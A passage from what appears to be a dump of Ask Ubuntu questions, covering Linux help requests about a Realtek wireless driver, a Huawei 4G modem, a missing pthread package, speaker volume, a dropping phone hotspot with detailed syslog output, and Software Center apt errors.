add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x10ec:0x8190 ( ndiswrapper ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # # # # # dmesg # # # # # [ 11.023828 ] ndiswrapper : module verification failed : signature and/or required key missing - tainting kernel [ 11.024621 ] ndiswrapper version 1.59 loaded ( smp=yes , preempt=no ) [ 12.524790 ] ndiswrapper : driver net819xp ( realtek semiconductor corp.,07/01/2009,1677.1.0708.2009 ) loaded [ 12.599971 ] ndiswrapper : using irq 22 [ 13.246570 ] wlan0 : ethernet device < mac address removed > using ndis driver : net819xp , version : 0x500a5 , ndis version : 0x500 , vendor : 'realtek rtl8190 wireless lan ( mini- ) pci nic ' , 10ec:8190.5.conf [ 13.246597 ] wlan0 : encryption modes supported : wep ; tkip with wpa , wpa2 , wpa2-psk ; aes/ccmp with wpa , wpa2 , wpa2-psk [ 15.550988 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 15.551131 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready # # # # # # # # # # wireless info end # # # # # # # # # # # # so whats the issue here and how do i fix this ? any help would be greatly appreciated , thank you .
453857	xdesktopwaves , xsnow , xpenguins wo n't work	i have installed xdesktopwaves , xsnow , xpenguins on ubuntu 14.04 . but they are not working at all . i am using gnome desktop .
453859	huawei 3276 modem not working in ubuntu 13.10	i have a huawei 3276 4g modem but i ca n't get it working on ubuntu 13.10 . i also tried to upgrade to 14.04 , but it did n't fix it , and had to downgrade to 13.10 because of some problems . several posts about this modem already exist , but i ca n't try their solutions . there is this script : https : //github.com/janhouse/4g-connect-linux which is supposed to work , but when i launch it , i get : $ sudo ./huawei-4g-linux.pl huawei 4g modem ( e3276 and possibly others ) script by janhouse ( janis jansons ) . no device found at /dev/ttyusb0 ( try specifying it in -- device= argument ) in my case , the modem seems to be mounted on /dev/sr0 , and i used diff to see the difference between the /dev folder when the modem is n't plugged and when it is : $ ls /dev > temp1 # not plugged yet $ ls /dev > temp2 # the modem is plugged $ diff temp1 temp2 5a6 > cdrom 78a80 > sdb 79a82,83 > sg1 > sg2 82a87 > sr0 so i retried the script using the -- device option : sudo ./huawei-4g-linux.pl -- device=/dev/sr0 huawei 4g modem ( e3276 and possibly others ) script by janhouse ( janis jansons ) . opening device : /dev/sr0 ca n't read serial port : read-only file system some people also suggested to update the cdc_ncm.ko driver , but i do n't know how to do this , is there any command to type or can i just replace the file with an updated version ? here are the output of lsb_release -a , uname -a , lsusb and syslog when i plug the modem : $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy $ uname -a linux chrubuntu 3.11.0-19-generic # 33-ubuntu smp tue mar 11 18:48:34 utc 2014 x86_64 x86_64 x86_64 gnu/linux $ lsusb bus 001 device 002 : id 8087:8000 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 002 device 006 : id 12d1:156a huawei technologies co. , ltd. # this is the modem bus 002 device 004 : id 0cf3:311e atheros communications , inc . bus 002 device 003 : id 04f2 : b40d chicony electronics co. , ltd bus 002 device 002 : id 046d : c52b logitech , inc. unifying receiver bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub $ sudo tail -f /var/log/syslog apr 23 17:50:39 chrubuntu kernel : [ 2501.501218 ] usb 2-8 : new high-speed usb device number 7 using xhci_hcd apr 23 17:50:39 chrubuntu kernel : [ 2501.518286 ] usb 2-8 : new usb device found , idvendor=12d1 , idproduct=156a apr 23 17:50:39 chrubuntu kernel : [ 2501.518296 ] usb 2-8 : new usb device strings : mfr=2 , product=1 , serialnumber=0 apr 23 17:50:39 chrubuntu kernel : [ 2501.518303 ] usb 2-8 : product : huawei mobile apr 23 17:50:39 chrubuntu kernel : [ 2501.518308 ] usb 2-8 : manufacturer : huawei technology apr 23 17:50:39 chrubuntu kernel : [ 2501.560896 ] usb-storage 2-8:1.0 : usb mass storage device detected apr 23 17:50:39 chrubuntu kernel : [ 2501.561031 ] scsi6 : usb-storage 2-8:1.0 apr 23 17:50:39 chrubuntu kernel : [ 2501.561269 ] usb-storage 2-8:1.1 : usb mass storage device detected apr 23 17:50:39 chrubuntu kernel : [ 2501.561503 ] scsi7 : usb-storage 2-8:1.1 apr 23 17:50:39 chrubuntu mtp-probe : checking bus 2 , device 7 : `` /sys/devices/pci0000:00/0000:00:14.0/usb2/2-8 '' apr 23 17:50:39 chrubuntu mtp-probe : bus : 2 , device : 7 was not an mtp device apr 23 17:50:40 chrubuntu kernel : [ 2502.561537 ] scsi 6:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 2 apr 23 17:50:40 chrubuntu kernel : [ 2502.561725 ] scsi 7:0:0:0 : direct-access huawei tf card storage 2.31 pq : 0 ansi : 2 apr 23 17:50:40 chrubuntu kernel : [ 2502.566288 ] sr0 : scsi-1 drive apr 23 17:50:40 chrubuntu kernel : [ 2502.566609 ] sr 6:0:0:0 : attached scsi cd-rom sr0 apr 23 17:50:40 chrubuntu kernel : [ 2502.566763 ] sr 6:0:0:0 : attached scsi generic sg1 type 5 apr 23 17:50:40 chrubuntu kernel : [ 2502.567083 ] sd 7:0:0:0 : attached scsi generic sg2 type 0 apr 23 17:50:40 chrubuntu kernel : [ 2502.571026 ] sd 7:0:0:0 : [ sdb ] attached scsi removable disk apr 23 17:50:40 chrubuntu kernel : [ 2502.756534 ] udf-fs : info mounting volume 'temp ' , timestamp 2013/04/10 15:41 ( 1000 ) apr 23 17:50:40 chrubuntu udisksd [ 1300 ] : mounted /dev/sr0 at /media/user/temp on behalf of uid 1000 any idea about how i could get it working ?
453860	unable to locate package pthread	it 's linux ubuntu 14 . i 'm trying to install gnu radio and when i try to configure , pthread library is missing . i then do sudo apt-get install pthread i got this as return : akula @ akula : ~/openbts/gnuradio-3.4.0 $ cd ~ akula @ akula : ~ $ sudo apt-get install pthread reading package lists ... done building dependency tree reading state information ... done e : unable to locate package pthread i did already all kinds of updates and everything else i found on the internet . if anyone could help me , i would be grateful .
453861	volume increased beyond 100 %	in sound settings there is an option to increase the volume beyond 100 % . if we use this setting will it cause any damage to the speakers eventually ?
453862	mobile wireless access point keeps dropping	i have a wireless access point on my phone that i 've just set up . the phone is a samsung galaxy s2 provided by att wireless . when i first set it up , network manager recognized the access point and i was able to connect . then , a day or two later , the connection would only remain for about a minute . i have consulted the following links and none of the suggestions there have had any impact on my situation : http : //www.askubuntu.com/questions/117969/wifi-hotspot-disconnected-after-some-time ( there is no relevant information in this answer at all . ) ( solved ) ca n't connect vpn pptp on 13.10 ( this is a vpn ) wifi connect problem ( setting sudo iw wlan0 set power_save off had no effect ) i can maintain a connection to other wifi routers , home work etc . just not the phone . i am running the following system : linux 3.11.0-19-generic # 33-ubuntu smp description : ubuntu 13.10 release : 13.10 codename : saucy the driver ( as provided by lspci ) is : network controller : intel corporation wireless 3160 ( rev 83 ) once i lose the connection , the device is no longer seen by the ssid scan . i have to restart wpa_supplicant in order to see it again and connect to it . tailing /var/log/syslog offers a few snippets of what is happening : the initial successful connection : apr 21 22:57:59 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : bringing up device . apr 21 22:57:59 eggsmachine kernel : [ 18251.911641 ] iwlwifi 0000:03:00.0 : l1 disabled ; enabling l0s apr 21 22:57:59 eggsmachine kernel : [ 18251.911885 ] iwlwifi 0000:03:00.0 : l1 disabled ; enabling l0s apr 21 22:57:59 eggsmachine kernel : [ 18251.924021 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready apr 21 22:57:59 eggsmachine networkmanager [ 930 ] : ( wlan0 ) supports 5 scan ssids apr 21 22:57:59 eggsmachine networkmanager [ 930 ] : trying to remove a non-existant call id . apr 21 22:57:59 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : supplicant interface state : starting - > ready apr 21 22:57:59 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : device state change : unavailable - > disconnected ( reason 'supplicant-available ' ) [ 20 30 42 ] apr 21 22:57:59 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : supplicant interface state : ready - > inactive apr 21 22:57:59 eggsmachine networkmanager [ 930 ] : ( wlan0 ) supports 5 scan ssids apr 21 22:58:14 eggsmachine networkmanager [ 930 ] : activation ( wlan0 ) starting connection 'eggmatters' apr 21 22:58:14 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] apr 21 22:58:14 eggsmachine networkmanager [ 930 ] : activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... apr 21 22:58:14 eggsmachine networkmanager [ 930 ] : activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... apr 21 22:58:14 eggsmachine whoopsie [ 1321 ] : offline apr 21 22:58:14 eggsmachine networkmanager [ 930 ] : activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... apr 21 22:58:14 eggsmachine networkmanager [ 930 ] : activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . apr 21 22:58:14 eggsmachine networkmanager [ 930 ] : activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... apr 21 22:58:14 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] apr 21 22:58:14 eggsmachine networkmanager [ 930 ] : activation ( wlan0/wireless ) : connection 'eggmatters ' has security , and secrets exist . no new secrets needed . apr 21 22:58:14 eggsmachine networkmanager [ 930 ] : config : added 'ssid ' value 'eggmatters' apr 21 22:58:14 eggsmachine networkmanager [ 930 ] : config : added 'scan_ssid ' value '1' apr 21 22:58:14 eggsmachine networkmanager [ 930 ] : config : added 'key_mgmt ' value 'wpa-psk' apr 21 22:58:14 eggsmachine networkmanager [ 930 ] : config : added 'psk ' value '' apr 21 22:58:14 eggsmachine networkmanager [ 930 ] : activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . apr 21 22:58:14 eggsmachine networkmanager [ 930 ] : config : set interface ap_scan to 1 apr 21 22:58:14 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : supplicant interface state : inactive - > scanning apr 21 22:58:18 eggsmachine wpa_supplicant [ 5029 ] : wlan0 : sme : trying to authenticate with 20:64:32:3a:91:85 ( ssid='eggmatters ' freq=2462 mhz ) apr 21 22:58:18 eggsmachine wpa_supplicant [ 5029 ] : wlan0 : trying to associate with 20:64:32:3a:91:85 ( ssid='eggmatters ' freq=2462 mhz ) apr 21 22:58:18 eggsmachine kernel : [ 18271.392061 ] wlan0 : authenticate with 20:64:32:3a:91:85 apr 21 22:58:18 eggsmachine kernel : [ 18271.392784 ] wlan0 : send auth to 20:64:32:3a:91:85 ( try 1/3 ) apr 21 22:58:18 eggsmachine kernel : [ 18271.394588 ] wlan0 : authenticated apr 21 22:58:18 eggsmachine kernel : [ 18271.395117 ] wlan0 : associate with 20:64:32:3a:91:85 ( try 1/3 ) apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : supplicant interface state : scanning - > associating apr 21 22:58:18 eggsmachine kernel : [ 18271.398930 ] wlan0 : rx assocresp from 20:64:32:3a:91:85 ( capab=0x411 status=0 aid=1 ) apr 21 22:58:18 eggsmachine wpa_supplicant [ 5029 ] : wlan0 : associated with 20:64:32:3a:91:85 apr 21 22:58:18 eggsmachine kernel : [ 18271.399687 ] wlan0 : associated apr 21 22:58:18 eggsmachine kernel : [ 18271.399824 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : supplicant interface state : associating - > associated apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : supplicant interface state : associated - > 4-way handshake apr 21 22:58:18 eggsmachine wpa_supplicant [ 5029 ] : wlan0 : wpa : key negotiation completed with 20:64:32:3a:91:85 [ ptk=ccmp gtk=ccmp ] apr 21 22:58:18 eggsmachine wpa_supplicant [ 5029 ] : wlan0 : ctrl-event-connected - connection to 20:64:32:3a:91:85 completed ( auth ) [ id=0 id_str= ] apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : supplicant interface state : 4-way handshake - > completed apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : activation ( wlan0/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'eggmatters ' . apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : activation ( wlan0 ) stage 3 of 5 ( ip configure start ) scheduled . apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : activation ( wlan0 ) stage 3 of 5 ( ip configure start ) started ... apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : activation ( wlan0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : dhclient started with pid 5282 apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : activation ( wlan0 ) stage 3 of 5 ( ip configure start ) complete . apr 21 22:58:18 eggsmachine dhclient : internet systems consortium dhcp client 4.2.4 apr 21 22:58:18 eggsmachine dhclient : copyright 2004-2012 internet systems consortium . apr 21 22:58:18 eggsmachine dhclient : all rights reserved . apr 21 22:58:18 eggsmachine dhclient : for info , please visit https : //www.isc.org/software/dhcp/ apr 21 22:58:18 eggsmachine dhclient : apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : dhcpv4 state changed nbi - > preinit apr 21 22:58:18 eggsmachine dhclient : listening on lpf/wlan0/a0:88:69:32 : fd : d9 apr 21 22:58:18 eggsmachine dhclient : sending on lpf/wlan0/a0:88:69:32 : fd : d9 apr 21 22:58:18 eggsmachine dhclient : sending on socket/fallback apr 21 22:58:18 eggsmachine dhclient : dhcprequest of 192.168.43.84 on wlan0 to 255.255.255.255 port 67 ( xid=0x78346b10 ) apr 21 22:58:18 eggsmachine dhclient : dhcpack of 192.168.43.84 from 192.168.43.1 apr 21 22:58:18 eggsmachine dhclient : bound to 192.168.43.84 -- renewal in 1469 seconds . apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : dhcpv4 state changed preinit - > reboot apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : address 192.168.43.84 apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : prefix 24 ( 255.255.255.0 ) apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : gateway 192.168.43.1 apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : hostname 'eggsmachine' apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : nameserver '192.168.43.1' apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : activation ( wlan0 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... apr 21 22:58:18 eggsmachine networkmanager [ 930 ] : activation ( wlan0 ) stage 5 of 5 ( ipv4 commit ) started ... apr 21 22:58:18 eggsmachine avahi-daemon [ 909 ] : joining mdns multicast group on interface wlan0.ipv4 with address 192.168.43.84 . apr 21 22:58:18 eggsmachine avahi-daemon [ 909 ] : new relevant interface wlan0.ipv4 for mdns . apr 21 22:58:18 eggsmachine avahi-daemon [ 909 ] : registering new address record for 192.168.43.84 on wlan0.ipv4 . apr 21 22:58:19 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : device state change : ip-config - > secondaries ( reason 'none ' ) [ 70 90 0 ] apr 21 22:58:19 eggsmachine networkmanager [ 930 ] : activation ( wlan0 ) stage 5 of 5 ( ipv4 commit ) complete . apr 21 22:58:19 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : device state change : secondaries - > activated ( reason 'none ' ) [ 90 100 0 ] apr 21 22:58:20 eggsmachine networkmanager [ 930 ] : policy set 'eggmatters ' ( wlan0 ) as default for ipv4 routing and dns . apr 21 22:58:20 eggsmachine networkmanager [ 930 ] : writing dns information to /sbin/resolvconf apr 21 22:58:20 eggsmachine dnsmasq [ 2018 ] : setting upstream servers from dbus apr 21 22:58:20 eggsmachine dnsmasq [ 2018 ] : using nameserver 192.168.43.1 # 53 apr 21 22:58:20 eggsmachine avahi-daemon [ 909 ] : joining mdns multicast group on interface wlan0.ipv6 with address fe80 : :a288:69ff : fe32 : fdd9 . apr 21 22:58:20 eggsmachine avahi-daemon [ 909 ] : new relevant interface wlan0.ipv6 for mdns . apr 21 22:58:20 eggsmachine avahi-daemon [ 909 ] : registering new address record for fe80 : :a288:69ff : fe32 : fdd9 on wlan0.* . apr 21 22:58:20 eggsmachine networkmanager [ 930 ] : activation ( wlan0 ) successful , device activated . apr 21 22:58:20 eggsmachine dbus [ 823 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) apr 21 22:58:20 eggsmachine whoopsie [ 1321 ] : offline apr 21 22:58:20 eggsmachine dbus [ 823 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' apr 21 22:58:20 eggsmachine whoopsie [ 1321 ] : online apr 21 22:58:21 eggsmachine whoopsie [ 1321 ] : online apr 21 22:58:27 eggsmachine ntpdate [ 5361 ] : adjust time server 91.189.94.4 offset -0.033826 sec then , in this instance , we lose the connection : apr 21 22:58:59 eggsmachine wpa_supplicant [ 5029 ] : wlan0 : ctrl-event-disconnected bssid=20:64:32:3a:91:85 reason=4 apr 21 22:58:59 eggsmachine kernel : [ 18311.899261 ] cfg80211 : calling crda to update world regulatory domain apr 21 22:58:59 eggsmachine kernel : [ 18311.901056 ] cfg80211 : world regulatory domain updated : apr 21 22:58:59 eggsmachine kernel : [ 18311.901058 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) apr 21 22:58:59 eggsmachine kernel : [ 18311.901059 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 21 22:58:59 eggsmachine kernel : [ 18311.901060 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 21 22:58:59 eggsmachine kernel : [ 18311.901061 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) apr 21 22:58:59 eggsmachine kernel : [ 18311.901062 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 21 22:58:59 eggsmachine kernel : [ 18311.901063 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 21 22:58:59 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : supplicant interface state : completed - > disconnected apr 21 22:58:59 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : supplicant interface state : disconnected - > scanning apr 21 22:59:11 eggsmachine wpa_supplicant [ 5029 ] : wlan0 : sme : trying to authenticate with 20:64:32:3a:91:85 ( ssid='eggmatters ' freq=2462 mhz ) apr 21 22:59:11 eggsmachine wpa_supplicant [ 5029 ] : wlan0 : trying to associate with 20:64:32:3a:91:85 ( ssid='eggmatters ' freq=2462 mhz ) apr 21 22:59:11 eggsmachine kernel : [ 18324.400907 ] wlan0 : authenticate with 20:64:32:3a:91:85 apr 21 22:59:11 eggsmachine kernel : [ 18324.401919 ] wlan0 : send auth to 20:64:32:3a:91:85 ( try 1/3 ) apr 21 22:59:11 eggsmachine kernel : [ 18324.403932 ] wlan0 : authenticated apr 21 22:59:11 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : supplicant interface state : scanning - > associating apr 21 22:59:11 eggsmachine kernel : [ 18324.408370 ] wlan0 : associate with 20:64:32:3a:91:85 ( try 1/3 ) apr 21 22:59:11 eggsmachine kernel : [ 18324.411832 ] wlan0 : rx assocresp from 20:64:32:3a:91:85 ( capab=0x411 status=0 aid=1 ) apr 21 22:59:11 eggsmachine wpa_supplicant [ 5029 ] : wlan0 : associated with 20:64:32:3a:91:85 apr 21 22:59:11 eggsmachine kernel : [ 18324.412786 ] wlan0 : associated apr 21 22:59:11 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : supplicant interface state : associating - > associated apr 21 22:59:14 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : link timed out . apr 21 22:59:14 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : device state change : activated - > failed ( reason 'supplicant-timeout ' ) [ 100 120 11 ] apr 21 22:59:14 eggsmachine networkmanager [ 930 ] : activation ( wlan0 ) failed for connection 'eggmatters' apr 21 22:59:14 eggsmachine whoopsie [ 1321 ] : offline apr 21 22:59:14 eggsmachine dbus [ 823 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) apr 21 22:59:14 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] apr 21 22:59:14 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] apr 21 22:59:14 eggsmachine dbus [ 823 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' apr 21 22:59:14 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : canceled dhcp transaction , dhcp client pid 5282 apr 21 22:59:14 eggsmachine avahi-daemon [ 909 ] : withdrawing address record for fe80 : :a288:69ff : fe32 : fdd9 on wlan0 . apr 21 22:59:14 eggsmachine avahi-daemon [ 909 ] : leaving mdns multicast group on interface wlan0.ipv6 with address fe80 : :a288:69ff : fe32 : fdd9 . apr 21 22:59:14 eggsmachine avahi-daemon [ 909 ] : interface wlan0.ipv6 no longer relevant for mdns . apr 21 22:59:14 eggsmachine avahi-daemon [ 909 ] : withdrawing address record for 192.168.43.84 on wlan0 . apr 21 22:59:14 eggsmachine avahi-daemon [ 909 ] : leaving mdns multicast group on interface wlan0.ipv4 with address 192.168.43.84 . apr 21 22:59:14 eggsmachine avahi-daemon [ 909 ] : interface wlan0.ipv4 no longer relevant for mdns . apr 21 22:59:14 eggsmachine kernel : [ 18327.457293 ] wlan0 : deauthenticating from 20:64:32:3a:91:85 by local choice ( reason=3 ) apr 21 22:59:14 eggsmachine networkmanager [ 930 ] : dns : plugin dnsmasq update failed apr 21 22:59:14 eggsmachine networkmanager [ 930 ] : removing dns information from /sbin/resolvconf apr 21 22:59:14 eggsmachine dnsmasq [ 2018 ] : setting upstream servers from dbus apr 21 22:59:14 eggsmachine wpa_supplicant [ 5029 ] : wlan0 : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=3 apr 21 22:59:14 eggsmachine kernel : [ 18327.459960 ] cfg80211 : calling crda to update world regulatory domain apr 21 22:59:14 eggsmachine kernel : [ 18327.464927 ] cfg80211 : world regulatory domain updated : apr 21 22:59:14 eggsmachine kernel : [ 18327.464934 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) apr 21 22:59:14 eggsmachine kernel : [ 18327.464939 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 21 22:59:14 eggsmachine kernel : [ 18327.464944 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 21 22:59:14 eggsmachine kernel : [ 18327.464947 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) apr 21 22:59:14 eggsmachine kernel : [ 18327.464950 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 21 22:59:14 eggsmachine kernel : [ 18327.464953 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 21 22:59:14 eggsmachine networkmanager [ 930 ] : ( wlan0 ) : supplicant interface state : associated - > disconnected for `` ctrl-event-disconnected bssid=20:64:32:3a:91:85 reason=4 '' , i ca n't find a resource that explains what reason=4 means . we do see that on the subsequent retry , the link times out with a ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=3 which makes sense as wpa_supplicant can no longer find the device . i can repeat this process by running : ps -ef | grep wpa kill -9 ( the pid of wpa_supplicant ) adding verbose logging to wpa_supplicant shows the following : apr 23 09:07:31 eggsmachine wpa_supplicant [ 4790 ] : wpa : drop tx eapol in non-ieee 802.1x mode ( type=1 len=0 ) apr 23 09:07:40 eggsmachine wpa_supplicant [ 4790 ] : eapol : external notification - portenabled=0 apr 23 09:07:40 eggsmachine wpa_supplicant [ 4790 ] : eapol : supp_pae entering state disconnected apr 23 09:07:40 eggsmachine wpa_supplicant [ 4790 ] : eapol : supplicant port status : unauthorized apr 23 09:07:40 eggsmachine wpa_supplicant [ 4790 ] : eapol : supp_be entering state initialize apr 23 09:07:40 eggsmachine wpa_supplicant [ 4790 ] : eapol : supplicant port status : unauthorized apr 23 09:07:40 eggsmachine wpa_supplicant [ 4790 ] : eapol : external notification - portvalid=0 apr 23 09:07:40 eggsmachine wpa_supplicant [ 4790 ] : eapol : supplicant port status : unauthorized apr 23 09:07:40 eggsmachine wpa_supplicant [ 4790 ] : eapol : external notification - eap success=0 apr 23 09:07:40 eggsmachine wpa_supplicant [ 4790 ] : eapol : supplicant port status : unauthorized apr 23 09:07:40 eggsmachine wpa_supplicant [ 4790 ] : eapol : external notification - portenabled=0 apr 23 09:07:40 eggsmachine wpa_supplicant [ 4790 ] : eapol : supplicant port status : unauthorized apr 23 09:07:40 eggsmachine wpa_supplicant [ 4790 ] : eapol : external notification - portvalid=0 apr 23 09:07:40 eggsmachine wpa_supplicant [ 4790 ] : eapol : supplicant port status : unauthorized apr 23 09:07:40 eggsmachine wpa_supplicant [ 4790 ] : eapol : external notification - eap success=0 apr 23 09:07:40 eggsmachine wpa_supplicant [ 4790 ] : eapol : supplicant port status : unauthorized apr 23 09:07:40 eggsmachine wpa_supplicant [ 4790 ] : eapol : supplicant port status : unauthorized so whatever eapol is , it 's not authenticating anymore . so as a quick recap : can not connect to mobil wireless ( samsung galaxy s2 via att ) for more than 1-5 minutes can connect to other wireless access points without issue . logs indicate device ca n't authenticate and times out . other forum posts indicate either a kernel issue or a device driver issue . my situation is confusing as i can connect to wifi hotspots . oh , and i 'm not entirely sure if it 's the phone or not . i have n't yet tested it on other devices . my instincts are telling me that it 's not the phone . thanks for taking the time to help me with this . just migrated from debian wheezy to ubuntu , so . . . that 's of no use whatsoever but , this is my first ask ubuntu post . update : i 've removed the mac address for this machine from the phone , and just simply authenticate with wpa2 . that , obviously , did nothing . the logs seem to indicate that the device no longer honors the authenticity of the connection . in trying to isolate wpa_supplicant , i 've called wpa_supplicant from the terminal , passing in driver , and ssid but that mucks with networkmanager which is running it 's own version of wpa_supplicant and apparently , they do n't play nice . the other culprit may be dnsmasq , as it looks like it 's querying my phone for a dns entry and maybe those two are n't interacting very well `` i 'd like a dns entry . sure . i 'd like a dns entry again . wait a second , i just gave you one two minutes ago . '' daily bump : do n't you just love it when well-formed issues providing background and logs as well as histories and log go unnoticed ? so , the connection is stable and continuous when tethered . something is up with the signal then . maybe it 's a bad driver ? not sure as this question is pretty fallow .
453863	problem with updates and software center	i first noticed the trying to open software center when i get the error 2014-04-23 13:50:03,240 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-04-23 13:50:03,258 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2014-04-23 13:50:03,408 - softwarecenter.region - warning - failed to use geoclue : 'org.freedesktop.geoclue.error.notavailable : geoclue master client has no usable address providers' 2014-04-23 13:50:03,605 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2014-04-23 13:50:03,935 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2014-04-23 13:50:03,958 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 243 , in open self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 105 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 150 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_precise_main_binary-amd64_packages , e : the package lists or status file could not be parsed or opened . 2014-04-23 13:50:05,560 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1422 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1352 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` 